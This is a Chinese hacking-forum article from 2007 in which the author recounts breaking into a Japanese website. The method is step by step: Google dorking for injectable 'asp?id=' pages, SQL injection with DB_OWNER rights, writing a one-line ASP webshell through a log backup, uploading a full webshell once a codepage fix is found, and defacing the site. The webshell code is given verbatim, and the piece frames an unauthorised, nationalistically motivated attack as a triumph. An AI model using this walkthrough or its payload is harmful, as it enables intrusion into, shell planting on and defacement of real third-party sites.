您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客教程 >> 正文

艰难的日本网站之旅
骇客基地 阅读: 时间:2007-10-11 1:07:22 来源:www.hookbase.com
   一、旅途开始    

   群里有位兄弟发话说,你们这些家伙天天研究那些什么漏洞,想着怎么去黑掉别人,不觉得没意思么,有本事黑几个日本站去!虽然有点过激但也不无道理。我虽然是菜菜,不过也要去看看有没有本事黑几个日本站去。

二、撒网捉鱼    

   操起啊D,打开google,输入关键字"asp?id=",每页显示设100页,语言为日文,一顿狂注之后出来N多注入点,如图1。随便找了一个,检测一下,发现可以注入,如图2。按照常规的方法先猜猜表猜猜列什么的,不过用猜出的用户名和密码登录后发现后台无法利用。而且日文我也看不懂,后台利用的方式应该行不通了。好在是SQL注入,权限又是DB_OWNER,只要能列出WEB目录,还是有希望搞的。于是试着列了下目录,发现可以正常列出来,如图3。下一步就是找WEB目录了,打开网站看看,哪些文件在上面能访问到,如图4。然后用啊D列目录,通过上面的文件的一致性来确定哪个目录才是WEB目录。初步确定F盘为网站目录所在盘,再进一步列目录后最终确定WEB根目录为:F:\JR???????????satsueki.jp?\,虽然看起来怪怪的,但这个的确是WEB根目录,如图5

三、瓮中捉鳖    

   好了,万事俱备,只欠东风了。这所谓的东风就是利用DB_OWNER的注入权限通过LOG备份的方式写入一句话小马。手工也可以,用工具也可以,我就用工具了。这里推荐用GetWebshellah56bug大众版。需要的信息有:注入点、注入类型、当前数据库、WEB路径。这些信息在用啊D检测的时候都已经有了,全部填好之后如图6。木马代码默认是一句话<%%25Execute(request("ah"))%%25>,%25就代表是空格。然后从第一步到第六步,不过点击的时候不要太快,一般控制在返回注入点页面的时候再点下一步就可以了。然后我们再访问一句话所在的页面,WEB目录下的x.asp就是一句话藏身之处了。我们访问它,如图7。页面底部有出错信息,一般看到这样的一句话就已经成功写进去的了。然后再用ASP+PHP两用Shell连接我们的一句话木马,提交环境变量。虽然返回的页面有点乱,但是已经连接成功的了,我们可以看到返回了服务器上的一些信息,如图8

四、山穷水复    

   本来以为这次入侵到这里就应该快结束的了。可能大家都会先想用一句话上传小马,再用小马上传大马就可以了。可是并没有这么简单,用一句话上传小马的时候却返回出错了,没有成功写入。后来发现目录根本不可写。于是就换了几个目录,发现大部分目录都没有写权限,无法写入ASP马。那时候真想放弃了,不过想到群里那位兄弟说的话,不敢放弃啊。我就不信它上面没有一个可写的目录!经过半小时左右的查找终于发现了:F:&amp;#92;JR???????????satsueki.jp?&amp;#92;shop&amp;#92;img目录下可写!接下来当然是上传大马了。不过为了使返回的页面清楚一点,我在这个目录下重新写进了一句话,然后通过一句话上传大马,提示上传文件成功了。我们现在去访问可爱的大马,结果出现了意外!因为并没有看到登录入口,只看到了几行可恶的出错提示,如图9!郁闷啊,当时真还以为马太大了,传的时候造成代码损坏了而导致出错呢。可是传了几次,还是一样的结果。又以为是语言的问题,就找了英文版的海阳传上去还是一样。问朋友要了十几个马传上去访问还是出错!连海阳的C/S端提交都出错,一句话专用提交的也试过了,还是不行!“郁闷”这两个字的意思那一刻我终于彻底明白了!

五、柳暗花明    

   万般无奈之下,唯有向他人求助了。于是上邪恶八进制发了帖求救,一会儿就有位朋友来帮忙了。他告诉我在ASP马的第一行加上<%@ LANGUAGE=VB codepage ="936" %>这么一行代码。我照着做了,在ASP马的最前面加上那一句代码,再传上去。然后访问,这一回看到了可爱的登录入口了(在此感谢邪八的hc3w朋友),如图10。至此webshell已经拿到了,如图11。但进去之后发现很多文件的确都是只读权限,连首页都改不了,就在可写目录传了个黑页,如图12。这个服务器上还有几十个日本网站,不过都是只读权限的,虽然有可写目录,但也不一一传黑页了。

六、反思    

  入侵结束了,但是那个加一行代码的问题,我当时还没有搞明白。搞定网站之后我去查了些资料。那行代码中936是一个叫代码页(所谓代码页(code page)就是针对一种语言文字的字符编码。例如GBK的code page是CP936,BIG5的code page是CP950,GB2312的code page是CP20936)的一个代号,表示简体中文。950就是繁体中文,932就是日文。这个只要记住936是我们用的就可以,以后如果遇到网页文件出现乱码的情况可以试着加那一行代码,就能正常解释成简体中文的了。菜菜一个,写错的地方请大家批评指正,我会经常上X的论坛逛的哦……
今天广告
参与评论:
注意事项:
【艰难的日本网站之旅】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号